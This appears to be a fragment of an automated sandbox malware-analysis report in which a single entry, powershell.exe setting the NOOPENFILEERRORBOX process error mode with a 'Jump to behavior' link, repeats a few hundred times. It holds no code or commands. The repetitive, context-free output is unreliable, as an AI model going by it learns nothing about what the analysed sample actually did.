    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
